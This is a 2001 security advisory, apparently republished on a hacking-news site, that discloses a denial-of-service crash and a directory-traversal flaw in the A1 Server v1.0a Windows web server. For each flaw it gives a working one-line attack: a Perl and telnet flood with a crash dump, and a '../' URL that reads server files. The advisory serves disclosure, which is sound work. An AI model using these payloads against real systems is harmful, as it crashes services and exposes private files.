Users login

Create an account »

JOIN XATRIX

Users login

Home » Hacking News » A1 Server v1.0a HTTPd (DoS & Dir Traversal)

A1 Server v1.0a HTTPd (DoS & Dir Traversal)

by Phiber on February 28th, 2001 A1 Server v1.0a is a HTTPd server for the Windows OS, and it will deliver the following content: GIF images, HTM or HTML pages, EXE files, and ZIP files. The server is very small, but yet somewhat stable and is freeware! (Yeah. right)


Problem #1 : Denial of Service Attack



A1 Server v1.0a is vulnerable to a nasty Denial of

Service attack where it can be flooded with useless

junk until the server crashes promptly. Once it has

been crashed it needs to be restarted again for it to

work properly. All windows versions apear to be

affected.



Example:



echo `perl -e 'print "A" x 1000'` | telnet a1server 80



^^ = Will cause the program to quit within seconds

and display:



A1SERVER caused an invalid page fault in module

A1SERVER.EXE at 016f:004101ae.

Registers:

EAX=00000000 CS=016f EIP=004101ae

EFLGS=00010246 EBX=00420094 SS=0177

ESP=006bfc70 EBP=006bfc78 ECX=ffffffff DS=0177

ESI=00000001 FS=6417 EDX=004263b2 ES=0177

EDI=00000001 GS=5e47 Bytes at CS:EIP:

f2 ae f7 d1 8b 7d 08 8b c7 8b d1 d1 e9 d1 e9 fc

Stack dump:

004211a8 0000001c 006bfca8 004151db 004211a8

00000001 006bfcb0 00008d20 006bfcfc bff7b796

bffc9490 00000177 006bfcb8 bff7b828 006bfcc8

bff7363b



Problem #2 : Directory Traversal



Adding the string "/../" to an URL allows an attacker to

view any file on the server provided you know where

the file is at in the first place.



Example:



http://www.a1server.win/../../../../../../Scandisk.log



^^ = Will obviously open the Scandisk.log file.





The Vendors website

Vendor has been notified. No e-mail reply yet.



--------------------

b10z HTTPd Advisory

[email protected]



Found: February 26th, 2001.


Newsletter signup

Signup to our monthly newsletter and stay in touch with IT news!

Free E-books

We've got ebooks! But they're not online. :( Please give us a few days to bring downloads back.

Contact

Have something to say or just wanna drop us a line? Please keep this in mind: to spam, we reply with spam.

Contact us »